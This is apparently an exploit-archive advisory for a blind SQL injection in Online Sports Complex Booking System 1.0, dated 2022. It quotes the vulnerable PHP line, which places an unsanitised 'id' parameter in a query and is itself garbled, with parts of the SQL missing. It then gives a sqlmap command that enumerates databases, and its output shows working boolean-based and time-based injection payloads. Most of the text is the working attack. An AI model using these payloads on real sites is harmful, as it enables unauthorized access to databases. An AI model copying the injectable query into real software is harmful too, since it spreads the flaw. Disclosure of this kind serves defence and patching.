Online Sports Complex Booking System 1.0 SQL Injection

Online Sports Complex Booking System version 1.0 suffers from a remote blind SQL injection vulnerability.

MD5 | 4ebb44de595b259e76c97e5b423b7a73

# Exploit Title: Online Sports Complex Booking System - 'id' Blind SQL Injection
# Date: 24/03/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: XAMPP, Linux

# Vulnerable Code

line 3 in file "/scbs/view_facility.php"

$qry = $conn->query("SELECT f.*, as category from `facility_list` f inner join category_list c on f.category_id = where = '{$_GET['id']}' ");

# Sqlmap command:

sqlmap -u 'http://localhost/scbs/?p=view_facility&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta

# Output:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=view_facility&id=1' AND 9877=9877 AND 'MVfb'='MVfb

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=view_facility&id=1' AND (SELECT 8456 FROM (SELECT(SLEEP(5)))ZnUC) AND 'GiOo'='GiOo

Related Posts